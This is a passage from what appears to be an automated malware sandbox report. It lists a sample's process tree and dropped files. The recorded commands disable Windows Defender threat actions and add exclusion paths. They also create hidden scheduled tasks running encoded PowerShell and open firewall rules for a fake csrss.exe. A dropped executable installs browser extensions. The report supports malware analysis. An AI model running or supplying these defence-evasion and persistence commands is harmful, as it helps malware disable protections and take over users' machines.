\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                        2⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5712
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:4236
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1012
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:5848
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:5928
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:2772
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:5956
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:5860
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:5940
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5900
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:3588
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:5884
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:5488
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:5496
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:5424
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:5872
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:3336
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:3544
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:3988
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:3024
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:2324
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:4688
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:4720
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:4572
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:5060
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:5796
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:5452
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:6060
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:5252
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AsRtOTETCNfDC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BCDBNUauOckU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VjBUDnCPU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qdWBYcETnEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WhKQivtBOjWPJtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\osszcinDeFgrFwAQ\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3820
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3460
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:1500
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:5700
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3496
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\osszcinDeFgrFwAQ /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4236
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                              4⤵
                                                                                                                PID:756
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\osszcinDeFgrFwAQ /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                                PID:756
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ogUloyuXvrpBpKVaB /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:5124
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:2440
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:5264
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:5364
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:5096
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WhKQivtBOjWPJtVB /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:1840
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:1964
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qdWBYcETnEUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4088
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qFmzepOeHSjDLjQlSgR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:5908
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4644
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VjBUDnCPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:3096
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BCDBNUauOckU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:2264
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:5388
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:5992
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "gavegSwZo" /SC once /ST 07:19:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                          2⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:6060
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "gavegSwZo"
                                                                                                                                          2⤵
                                                                                                                                            PID:1096
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /CREATE /TN "aKUtYNqNUJyRiHHcg" /SC once /ST 01:13:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\WTYqnKL.exe\" ts /LTsite_idMWK 385118 /S" /V1 /F
                                                                                                                                            2⤵
                                                                                                                                            • Drops file in Windows directory
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:4692
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /run /I /tn "aKUtYNqNUJyRiHHcg"
                                                                                                                                            2⤵
                                                                                                                                              PID:3700
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              schtasks /DELETE /F /TN "gavegSwZo"
                                                                                                                                              2⤵
                                                                                                                                                PID:3764
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AsRtOTETCNfDC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              1⤵
                                                                                                                                                PID:5304
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                1⤵
                                                                                                                                                  PID:456
                                                                                                                                                  • C:\Windows\system32\gpupdate.exe
                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5900
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5956
                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5384
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5304
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5848
                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            PID:5424
                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                                                                            1⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            PID:2964
                                                                                                                                                          • C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\WTYqnKL.exe
                                                                                                                                                            C:\Windows\Temp\osszcinDeFgrFwAQ\ZDkhhVePCqlviCa\WTYqnKL.exe ts /LTsite_idMWK 385118 /S
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:5356
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /DELETE /F /TN "bLyGxHYCYhmZEhkSec"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5264
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5064
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5528
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VjBUDnCPU\erBWMG.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "VeNWzXAjHYHBoCZ" /V1 /F
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:5544
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2004
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3984
                                                                                                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5424
                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3764
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401122334161\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xf62614,0xf62620,0xf6262c
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:2120
                                                                                                                                                                        • C:\Windows\windefender.exe
                                                                                                                                                                          C:\Windows\windefender.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2132

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                          Filesize

                                                                                                                                                                          203KB

                                                                                                                                                                          MD5

                                                                                                                                                                          f77e7bee5d229cb3fac7d9508894414e

                                                                                                                                                                          SHA1

                                                                                                                                                                          380f5fe828833829e223214c6af115dfb8c342b0

                                                                                                                                                                          SHA256

                                                                                                                                                                          428303480beaf8cbef7861f8681a0fe09d5c19236aab748ea18e0ae754560ae9

                                                                                                                                                                          SHA512

